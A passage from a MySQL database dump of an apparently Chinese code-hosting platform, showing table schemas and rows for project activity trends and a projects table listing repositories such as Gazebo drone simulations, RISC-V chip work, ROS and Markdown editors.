07:04:46'),(162,46,376,'Issue',276,'create','2021-03-03 02:55:26','2021-03-03 02:55:26'),(163,46,376,'Issue',277,'create','2021-03-03 02:57:23','2021-03-03 02:57:23'),(164,181,376,'Issue',278,'create','2021-03-03 03:00:39','2021-03-03 03:00:39'),(165,181,376,'Issue',279,'create','2021-03-03 03:03:26','2021-03-03 03:03:26'),(166,181,376,'Issue',280,'create','2021-03-03 03:06:03','2021-03-03 03:06:03'),(167,181,376,'Issue',281,'create','2021-03-03 03:06:42','2021-03-03 03:06:42'),(168,181,376,'Issue',282,'create','2021-03-03 03:08:07','2021-03-03 03:08:07'),(169,49,376,'Issue',283,'create','2021-03-03 03:19:31','2021-03-03 03:19:31'),(170,49,376,'Issue',284,'create','2021-03-03 06:44:43','2021-03-03 06:44:43'),(171,49,376,'Issue',285,'create','2021-03-03 06:46:47','2021-03-03 06:46:47'),(172,49,376,'Issue',286,'create','2021-03-03 06:47:04','2021-03-03 06:47:04'),(173,46,376,'Issue',287,'create','2021-03-03 06:47:31','2021-03-03 06:47:31'),(174,49,376,'Issue',288,'create','2021-03-03 06:47:52','2021-03-03 06:47:52'),(175,49,376,'Issue',289,'create','2021-03-03 06:54:08','2021-03-03 06:54:08'),(176,49,376,'Issue',290,'create','2021-03-03 06:54:39','2021-03-03 06:54:39'),(177,49,376,'Issue',291,'create','2021-03-03 06:55:29','2021-03-03 06:55:29'),(178,49,376,'Issue',292,'create','2021-03-03 06:56:24','2021-03-03 06:56:24'),(179,49,376,'Issue',293,'create','2021-03-03 07:00:56','2021-03-03 07:00:56'),(180,49,376,'Issue',294,'create','2021-03-03 07:01:08','2021-03-03 07:01:08'),(181,49,376,'Issue',295,'create','2021-03-03 07:01:28','2021-03-03 07:01:28'),(183,49,376,'Issue',297,'create','2021-03-03 07:05:59','2021-03-03 07:05:59'),(184,49,376,'Issue',298,'create','2021-03-04 03:27:49','2021-03-04 03:27:49'),(185,49,376,'Issue',299,'create','2021-03-04 07:10:59','2021-03-04 07:10:59'),(186,49,376,'Issue',300,'create','2021-03-04 07:16:38','2021-03-04 07:16:38'),(187,49,376,'Issue',301,'create','2021-03-05 01:30:37','2021-03-05 01:30:37'),(188,49,376,'Issue',302,'create','2021-03-05 01:38:28','2021-03-05 01:38:28'),(189,49,376,'Issue',303,'create','2021-03-05 01:57:02','2021-03-05 01:57:02'),(190,1,376,'Issue',304,'create','2021-03-08 06:48:40','2021-03-08 06:48:40'),(191,1,376,'Issue',305,'create','2021-03-08 06:49:54','2021-03-08 06:49:54'),(192,49,376,'Issue',306,'create','2021-03-10 07:31:53','2021-03-10 07:31:53'),(193,49,376,'Issue',307,'create','2021-03-10 07:38:31','2021-03-10 07:38:31'),(194,1,376,'PullRequest',88,'close','2021-03-11 01:38:49','2021-03-11 01:38:49');
|
||
/*!40000 ALTER TABLE `project_trends` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `projecting_softapplictions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `projecting_softapplictions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `projecting_softapplictions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`softapplication_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `projecting_softapplictions`
|
||
--
|
||
|
||
LOCK TABLES `projecting_softapplictions` WRITE;
|
||
/*!40000 ALTER TABLE `projecting_softapplictions` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `projecting_softapplictions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `projects` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL DEFAULT '',
|
||
`description` longtext,
|
||
`homepage` varchar(255) DEFAULT '',
|
||
`is_public` tinyint(1) NOT NULL DEFAULT '1',
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`status` int(11) NOT NULL DEFAULT '1',
|
||
`lft` int(11) DEFAULT NULL,
|
||
`rgt` int(11) DEFAULT NULL,
|
||
`inherit_members` tinyint(1) NOT NULL DEFAULT '0',
|
||
`project_type` int(11) DEFAULT '0',
|
||
`hidden_repo` tinyint(1) NOT NULL DEFAULT '0',
|
||
`attachmenttype` int(11) DEFAULT '1',
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`dts_test` int(11) DEFAULT '0',
|
||
`enterprise_name` varchar(255) DEFAULT NULL,
|
||
`organization_id` int(11) DEFAULT NULL,
|
||
`project_new_type` int(11) DEFAULT NULL,
|
||
`gpid` int(11) DEFAULT NULL,
|
||
`forked_from_project_id` int(11) DEFAULT NULL,
|
||
`forked_count` int(11) DEFAULT '0',
|
||
`publish_resource` int(11) DEFAULT '0',
|
||
`visits` int(11) DEFAULT '0',
|
||
`hot` int(11) DEFAULT '0',
|
||
`invite_code` varchar(255) DEFAULT NULL,
|
||
`qrcode` varchar(255) DEFAULT NULL,
|
||
`qrcode_expiretime` int(11) DEFAULT '0',
|
||
`script` text,
|
||
`training_status` tinyint(4) DEFAULT '0',
|
||
`rep_identifier` varchar(255) DEFAULT NULL,
|
||
`project_category_id` int(11) DEFAULT NULL,
|
||
`project_language_id` int(11) DEFAULT NULL,
|
||
`license_id` int(11) DEFAULT NULL,
|
||
`ignore_id` int(11) DEFAULT NULL,
|
||
`praises_count` int(11) DEFAULT '0',
|
||
`watchers_count` int(11) DEFAULT '0',
|
||
`issues_count` int(11) DEFAULT '0',
|
||
`pull_requests_count` int(11) DEFAULT '0',
|
||
`language` varchar(255) DEFAULT NULL,
|
||
`versions_count` int(11) DEFAULT '0',
|
||
`issue_tags_count` int(11) DEFAULT '0',
|
||
`closed_issues_count` int(11) DEFAULT '0',
|
||
`open_devops` tinyint(1) DEFAULT '0',
|
||
`gitea_webhook_id` int(11) DEFAULT NULL,
|
||
`open_devops_count` int(11) DEFAULT '0' COMMENT '针对同一台ci服务器激活devops流程的次数',
|
||
`recommend` tinyint(1) DEFAULT '0',
|
||
`platform` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_projects_on_lft` (`lft`),
|
||
KEY `index_projects_on_rgt` (`rgt`),
|
||
KEY `index_projects_on_identifier` (`identifier`),
|
||
KEY `index_projects_on_project_type` (`project_type`),
|
||
KEY `index_projects_on_updated_on` (`updated_on`),
|
||
KEY `index_projects_on_is_public` (`is_public`),
|
||
KEY `index_projects_on_status` (`status`),
|
||
KEY `index_projects_on_forked_from_project_id` (`forked_from_project_id`),
|
||
KEY `index_projects_on_recommend` (`recommend`),
|
||
KEY `index_projects_on_platform` (`platform`),
|
||
KEY `index_projects_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=526 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `projects`
|
||
--
|
||
|
||
LOCK TABLES `projects` WRITE;
|
||
/*!40000 ALTER TABLE `projects` DISABLE KEYS */;
|
||
INSERT INTO `projects` VALUES (99,'Markdown中文版编辑器','1. Markdown是什么?\nMarkdown是一种轻量级标记语言,它以纯文本形式(易读、易写、易更改)编写文档,并最终以HTML格式发布。\nMarkdown也可以理解为将以MARKDOWN语法编写的语言转换成HTML内容的工具。\n\n2. 谁创造了它?\n它由Aaron Swartz和John Gruber共同设计,Aaron Swartz就是那位于去年(2013年1月11日)自杀,有着开挂一般人生经历的程序员。维基百科对他的介绍是:软件工程师、作家、政治组织者、互联网活动家、维基百科人。','',1,NULL,'2019-01-21 23:49:37','2020-08-07 10:46:33','pp3fnk7u2',1,63,64,0,0,0,1,1,0,NULL,NULL,NULL,130,NULL,NULL,0,386,0,'AUZ4EF',NULL,0,NULL,0,'pp3fnk7u2',NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(100,'DemoPlus','','',1,NULL,'2019-01-22 00:19:13','2020-08-07 10:46:33','p5gj3eup9',1,65,66,0,0,0,1,1,0,NULL,NULL,NULL,131,NULL,NULL,0,259,0,'QUYTK6',NULL,0,NULL,0,'p5gj3eup9',NULL,NULL,1,NULL,0,0,1,1,'Java',0,0,0,0,NULL,0,0,0),(101,'可控开源社区1.0','','',1,NULL,'2019-01-22 09:06:36','2020-08-07 10:46:33','pfeqmgvux',1,67,68,0,0,0,1,1,0,NULL,NULL,NULL,132,NULL,1,0,143,0,'O3BM6Z',NULL,0,NULL,0,'pfeqmgvux',NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(102,'可控开源社区1.0','','',1,NULL,'2019-01-22 09:32:37','2020-08-07 10:46:34','pfeqmgvux',1,69,70,0,0,0,1,6,0,NULL,NULL,NULL,133,101,NULL,0,222,0,NULL,NULL,0,NULL,0,NULL,NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(103,'可控开源社区1.0','','',1,NULL,'2019-01-22 09:32:38','2020-08-07 10:46:34','pfeqmgvux-1',1,71,72,0,0,0,1,6,0,NULL,NULL,NULL,134,101,1,0,420,0,'9KHR2L',NULL,0,NULL,0,NULL,NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(120,'Gazebo-opt-test',' 基于Gazebo7.14,针对30架Hector四旋翼无人机仿真案例,采用并行技术(OpenMP)优化仿真瓶颈模型预处理模块,采用分布式技术将图像感知功能进行分离,使得30架Hector四旋翼无人机仿真RTF达到1.0.','',0,NULL,'2019-03-04 16:35:36','2020-08-07 10:46:35','ppovb5fc7',1,73,74,0,0,0,1,26,0,NULL,NULL,NULL,135,NULL,1,0,544,0,'ATMNXV',NULL,0,NULL,0,'ppovb5fc7',NULL,NULL,1,NULL,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(127,'基于RISCV指令集的嵌入式低功耗芯片','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',0,NULL,'2019-03-22 16:06:15','2020-08-07 10:46:35','p59vpf7at',1,75,76,0,0,0,1,32,0,NULL,NULL,NULL,136,NULL,2,0,208,0,'PYSE3N',NULL,0,NULL,0,'p59vpf7at',NULL,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(129,'Gazebo_Distributed','分布式Gazebo','',0,NULL,'2019-03-28 10:48:42','2020-08-07 10:46:36','pxmlw6n2f',1,77,78,0,0,0,1,29,0,NULL,NULL,NULL,137,NULL,NULL,0,245,0,'NV4DTA',NULL,0,NULL,0,'pxmlw6n2f',NULL,NULL,1,NULL,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(130,'Gazebo-exercise','本项目(Gazebo_exercise)在官方Gazebo7.14版本仿真器的基础上,采用OpenMP、线程池等技术进行了优化。','',1,NULL,'2019-04-01 11:23:26','2020-08-07 10:46:36','p9fj35fl6',1,79,80,0,0,0,1,26,0,NULL,NULL,NULL,138,NULL,NULL,0,7791,0,'PEM8SR',NULL,0,NULL,0,'p9fj35fl6',NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(131,'可控开源社区','','',1,NULL,'2019-04-28 10:06:34','2020-08-07 10:46:37','pw8v6oxsu',1,81,82,0,0,0,1,6,0,NULL,NULL,NULL,139,NULL,NULL,0,207,0,'MULOXP',NULL,0,NULL,0,'pw8v6oxsu',NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(132,'对抗性人工智能应对策略及算法研究','在识别图片时,能够对图片集合进行微小的修改或使其失真,以激发学习模型“领会”到越来越强的抗干扰能力,并形成相关的自我抗干扰训练模型。经过此类小规模的失真训练后,最终的抗干扰训练模型将更加强大,当真正的攻击到来之时,机器学习模型将具备“免疫”功能。\n\n 这其实是针对深度学习模型专门打造的训练。因为它会“学习”,所以也会学着纠错。','',1,NULL,'2019-08-07 15:10:24','2020-08-07 10:46:37','FqWIsYDRv',1,83,84,0,0,0,1,51,0,NULL,NULL,NULL,140,NULL,NULL,0,48,0,'4UOKGW',NULL,0,NULL,0,NULL,NULL,NULL,1,NULL,0,0,0,0,'Python',0,0,0,0,NULL,0,0,0),(137,'hector_quadrotor','hector quadrotor 整合了ros和gazebo,可以进行uav相关的很多仿真,例如飞行动力学,机载传感器例如imu、gps、camera,复杂环境仿真等等。','',1,NULL,'2019-08-16 08:09:17','2020-08-07 10:46:38','hector_quadrotor',1,85,86,0,0,0,1,50,0,NULL,NULL,NULL,141,NULL,NULL,0,24,0,'CV4O7A',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(139,'meta-ros','OpenEmbedded Layer for ROS Applications','',1,NULL,'2019-08-16 08:14:51','2020-08-07 10:46:38','meta-ros',1,87,88,0,0,0,1,50,0,NULL,NULL,NULL,142,NULL,NULL,0,50,0,'VZTC67',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'Python',0,0,0,0,NULL,0,0,0),(140,'att_ekf','Extented Kalman Filter for attitude estimation using ROS','',1,NULL,'2019-08-16 08:19:15','2020-08-07 10:46:38','att_ekf',1,89,90,0,0,0,1,50,0,NULL,NULL,NULL,143,NULL,NULL,0,18,0,'Y7POT2',NULL,0,NULL,0,NULL,5,NULL,1,NULL,0,0,0,0,'GO',0,0,0,0,NULL,0,0,0),(141,'cylon','一个机器人JavaScript开发框架,可使用Node.js进行机器人开发和物理计算;它提供了一个简单但强大的方法来解决同一时间处理不同硬件设备的问题。Cylon.js支持包括ARDrone、Arduino等在内的18个不同的硬件平台。','',1,NULL,'2019-08-16 08:23:46','2020-08-07 10:46:39','cylon',1,91,92,0,0,0,1,50,0,NULL,NULL,NULL,144,NULL,1,0,88,0,'S5BLNE',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'Javascript',0,0,0,0,NULL,0,0,0),(143,'AirSim','Open source simulator for autonomous vehicles built on Unreal Engine / Unity, from Microsoft AI & Research','',1,NULL,'2019-08-16 08:31:31','2020-08-07 10:46:39','airsim',1,93,94,0,0,0,1,50,0,NULL,NULL,NULL,145,NULL,NULL,0,65,0,'M4T6RV',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(144,'ros','ROS is a meta-operating system for your robot. It provides\nlanguage-independent and network-transparent communication for a\ndistributed robot control system.','',1,NULL,'2019-08-16 09:31:37','2020-08-07 10:46:40','kinetic-devel',1,95,96,0,0,0,1,54,0,NULL,NULL,NULL,146,NULL,1,0,116,0,'RO5MXK',NULL,0,NULL,0,NULL,16,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(156,'chartkick','Chartkick\n\nCreate beautiful JavaScript charts with one line of Ruby. No more fighting with charting libraries!\n\nSee it in action\n\n','',1,NULL,'2019-09-29 09:10:33','2020-08-07 10:46:40','chartkick',1,97,98,0,0,0,1,50,0,NULL,NULL,NULL,147,NULL,1,0,34,0,'CL3SEQ',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'Javascript',0,0,0,0,NULL,0,0,0),(157,'action-store','ActionStore 采用 Active Record 多态关联(Polymorphic Association)的方式存储各种类型的动作数据,例如:赞、喜欢、收藏、关注、订阅、屏蔽(靠你的想象,还可以干更多的事情)等等,各类 User -> Target 的场景。\n\n因此你无需对这些动作重复重建表、Model,也不用重复写 like_topic, unlike_topic, @topic.like_by_users, @user.like_topics 之类的逻辑函数。一切都由 ActionStore 内部帮你处理掉。\n项目地址:\n\nhttps://github.com/rails-engine/action-store\n适用的场景\n\n 赞(Like) - Post / Topic / Reply / Comment / Issue ...\n 订阅 (Subscribe) - Post / Category\n 好友关注 (Follow) - User\n 收藏 (Star) - Post / Topic / Reply\n\n基本结构\nField 含义\naction_type action 类型 [like, watch, follow, star, favorite]\nuser_type, user_id 多态的方式关联 User models [User, Person, Member]\ntarget_type, target_id 多态的方式关联 Target models [User, Post, Comment]','',1,NULL,'2019-09-30 11:15:19','2020-08-07 10:46:41','VXuUqnRvc',1,99,100,0,0,0,1,50,0,NULL,NULL,NULL,148,NULL,NULL,0,51,0,'FUL8H5',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'Ruby',0,0,0,0,NULL,0,0,0),(158,'redux-scc','Redux is a tiny library, but its contracts and APIs are carefully chosen to spawn an ecosystem of tools and extensions, and the community has created a wide variety of helpful addons, libraries, and tools. You don\'t need to use any of these addons to use Redux, but they can help make it easier to implement features and solve problems in your application.\n\nFor an extensive catalog of libraries, addons, and tools related to Redux, check out the Redux Ecosystem Links list. Also, the React/Redux Links list contains tutorials and other useful resources for anyone learning React or Redux.\n\nThis page lists some of the Redux-related addons that the Redux maintainers have vetted personally, or that have shown widespread adoption in the community. Don\'t let this discourage you from trying the rest of them! The ecosystem is growing too fast, and we have a limited time to look at everything. Consider these the “staff picks”, and don\'t hesitate to submit a PR if you\'ve built something wonderful with Redux.','',1,NULL,'2019-09-30 11:36:22','2020-08-07 10:46:41','redux-scc',1,101,102,0,0,0,1,50,0,NULL,NULL,NULL,149,NULL,1,0,64,0,'JFY2S6',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(159,'redux-bluetooth','蓝牙技术是一种无线数据与语音通信的开放性全球规范,它以低成本的近距离无线连接为基础,为固定与移动设备通信环境建立一个特别连接。其实质内容是为固定设备或移动设备之间的通信环境建立通用的无线电空中接口(Radio Air Interface),将通信技术与计算机技术进一步结合起来,使各种3C设备在没有电线或电缆相互连接的情况下,能在近距离范围内实现相互通信或操作。简单的说,蓝牙技术是一种利用低功率无线电在各种3C设备间彼此传输数据的技术。蓝牙工作在全球通用的2.4GHz ISM(即工业、科学、医学)频段,使用IEEE802.11协议。作为一种新兴的短距离无线通信技术,正有力地推动着低速率无线个人区域网络的发展。','',1,NULL,'2019-09-30 12:14:18','2020-08-07 10:46:41','redux-bluetooth',1,103,104,0,0,0,1,50,0,NULL,NULL,NULL,150,NULL,NULL,0,79,0,'USQT23',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(169,'Ruby Study1.0','FirstRuby \n介绍\n Ruby,一种简单快捷的面向对象(面向对象程序设计)脚本语言,在20世纪90年代由日本人松本行弘(Yukihiro Matsumoto)开发,遵守GPL协议和Ruby License。它的灵感与特性来自于 Perl、Smalltalk、Eiffel、Ada以及 Lisp 语言。由 Ruby 语言本身还发展出了JRuby(Java平台)、IronRuby(.NET平台)等其他平台的 Ruby 语言替代品。Ruby的作者于1993年2月24日开始编写Ruby,直至1995年12月才正式公开发布于fj(新闻组)。因为Perl发音与6月诞生石pearl(珍珠)相同,因此Ruby以7月诞生石ruby(红宝石)命名。\n\n学习Ruby语音的开发平台\n软件架构\n\n软件架构说明\n安装教程\n\n xxxx\n xxxx\n xxxx\n\n使用说明\n\n xxxx\n xxxx\n xxxx\n\n参与贡献\n\n Fork 本仓库\n 新建 Feat_xxx 分支\n 提交代码\n 新建 Pull Request\n\n\nRubyStudy\n\nthis is a study repository of Ruby\n\n 68f8fce76d515b5033ba14093748a056e3414dc1\n\n','',1,NULL,'2019-10-23 15:20:39','2020-08-07 10:46:42','rubystudy',1,107,108,0,0,0,1,46,0,NULL,NULL,NULL,151,NULL,NULL,0,251,0,'N6RW27',NULL,0,NULL,0,NULL,13,NULL,1,NULL,0,0,0,0,'Ruby',0,0,0,0,NULL,0,0,0),(178,'wblog','Blog就是以网络作为载体,简易迅速便捷地发布自己的心得,及时有效轻松地与他人进行交流,再集丰富多彩的个性化展示于一体的综合性平台。不同的博客可能使用不同的编码,所以相互之间也不一定兼容。而且,很多博客都提供丰富多彩的模板或其他个性化方案,这使得不同的博客各具特色。Blog是继Email、BBS、ICQ之后出现的第四种网络交流方式,至今已十分受大家的欢迎,是网络时代的个人“读者文摘”,是以超级链接为入口的网络日记,是代表着新的生活方式和新的工作方式,更代表着新的学习方式。具体说来,博客(Blogger)这个概念解释为使用特定的软件,在网络上出版,发表和张贴个人文章的人。','',1,NULL,'2019-10-29 15:24:34','2020-08-07 10:46:42','wblog',1,109,110,0,0,0,1,50,0,NULL,NULL,NULL,152,NULL,3,0,120,0,'5JAZMO',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(199,'基于RISCV指令集的嵌入式低功耗芯片','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-11-07 15:51:07','2020-08-07 10:46:43','risc-v3',1,111,112,0,0,0,1,49,0,NULL,NULL,NULL,153,NULL,7,0,2216,0,'PL7B93',NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(217,'goMonitorLog',NULL,'',1,NULL,'2019-11-11 10:31:00','2020-08-07 10:46:43','DZKnwufiE',1,115,116,0,0,0,1,50,0,NULL,NULL,NULL,154,NULL,NULL,0,1,0,NULL,NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(219,'rCore的在线运行机制的控制与解析','rCore的在线运行机制的控制与解析','',1,NULL,'2019-11-11 10:47:56','2020-08-07 10:46:44','ddd_xxxs',1,117,118,0,0,0,1,50,0,NULL,NULL,NULL,155,NULL,NULL,0,35,0,'9FCT83',NULL,0,NULL,0,NULL,1,NULL,2,69,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(221,'DeFiBus',NULL,'',1,NULL,'2019-11-11 10:51:15','2020-08-07 10:46:44','defibus',1,119,120,0,0,0,1,50,0,NULL,NULL,NULL,156,NULL,NULL,0,10,0,'O6MHTY',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(223,'gopub','','',0,NULL,'2019-11-11 11:04:25','2020-08-07 10:46:45','gopub',1,121,122,0,0,0,1,50,0,NULL,NULL,NULL,157,NULL,NULL,0,14,0,'HQJXB2',NULL,0,NULL,0,NULL,1,NULL,2,99,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(224,'基于RISCV指令集的嵌入式低功耗芯片','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-11-11 11:38:58','2020-08-07 10:46:45','RISC-V3',1,123,124,0,0,0,1,64,0,NULL,NULL,NULL,158,199,NULL,0,15,0,'36STC4',NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(225,'wblog','Blog就是以网络作为载体,简易迅速便捷地发布自己的心得,及时有效轻松地与他人进行交流,再集丰富多彩的个性化展示于一体的综合性平台。不同的博客可能使用不同的编码,所以相互之间也不一定兼容。而且,很多博客都提供丰富多彩的模板或其他个性化方案,这使得不同的博客各具特色。Blog是继Email、BBS、ICQ之后出现的第四种网络交流方式,至今已十分受大家的欢迎,是网络时代的个人“读者文摘”,是以超级链接为入口的网络日记,是代表着新的生活方式和新的工作方式,更代表着新的学习方式。具体说来,博客(Blogger)这个概念解释为使用特定的软件,在网络上出版,发表和张贴个人文章的人。','',1,NULL,'2019-11-11 11:44:39','2020-08-07 10:46:45','wblog',1,125,126,0,0,0,1,49,0,NULL,NULL,NULL,159,178,NULL,0,11,0,'VPQGHY',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(226,'基于RISCV指令集的嵌入式低功耗芯片','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-11-11 12:34:37','2020-08-07 10:46:46','RISC-V3',1,127,128,0,0,0,1,50,0,NULL,NULL,NULL,160,199,NULL,0,16,0,'PHTMSY',NULL,0,NULL,0,NULL,19,NULL,1,89,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(230,'可控开源社区1.0','','',1,NULL,'2019-11-11 15:37:23','2020-08-07 10:46:46','pfeqmgvux-1',1,131,132,0,0,0,1,49,0,NULL,NULL,NULL,161,103,NULL,0,6,0,'Y2XV6T',NULL,0,NULL,0,NULL,NULL,NULL,1,NULL,0,0,0,0,'Java',0,0,0,0,NULL,0,0,0),(231,'cylon','一个机器人JavaScript开发框架,可使用Node.js进行机器人开发和物理计算;它提供了一个简单但强大的方法来解决同一时间处理不同硬件设备的问题。Cylon.js支持包括ARDrone、Arduino等在内的18个不同的硬件平台。','',1,NULL,'2019-11-11 15:37:29','2020-08-07 10:46:47','cylon',1,133,134,0,0,0,1,64,0,NULL,NULL,NULL,162,141,NULL,0,5,0,'H2EBA5',NULL,0,NULL,0,NULL,1,NULL,1,NULL,0,0,0,0,'Javascript',0,0,0,0,NULL,0,0,0),(232,'基于RISCV指令集的嵌入式低功耗芯片2','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-11-11 17:07:52','2020-08-07 10:46:47','risc-v2',1,135,136,0,0,0,1,49,0,NULL,NULL,NULL,163,NULL,4,0,290,0,'TRAP92',NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(248,'基于RISCV指令集的嵌入式低功耗芯片','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-11-22 15:41:18','2020-08-07 10:46:48','RISC-V3',1,139,140,0,0,0,1,65,0,NULL,NULL,NULL,164,199,NULL,0,4,0,'W4KUCO',NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(250,'基于RISCV指令集的嵌入式低功耗芯片2','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2019-12-04 08:21:58','2020-08-07 10:46:48','risc-v2',1,141,142,0,0,0,1,50,0,NULL,NULL,NULL,165,232,NULL,0,22,0,'BNQUGW',NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(251,'团队协同开发','团队协调开发提交代码,共享文件,协同开发','',0,NULL,'2020-02-01 19:03:09','2020-08-07 10:46:48','master',1,143,144,0,0,0,1,75,0,NULL,NULL,NULL,166,NULL,1,0,583,0,'G3MLCP',NULL,0,NULL,0,NULL,20,NULL,11,119,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(252,'团队托管项目申请','用于团队系统开发','',1,NULL,'2020-02-01 21:17:31','2020-08-07 10:46:49','YUPibIXCB',1,145,146,0,0,0,1,75,0,NULL,NULL,NULL,167,NULL,NULL,0,39,0,'JEZQRD',NULL,0,NULL,0,NULL,20,NULL,11,119,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(253,'基于RISCV指令集的嵌入式低功耗芯片2rt 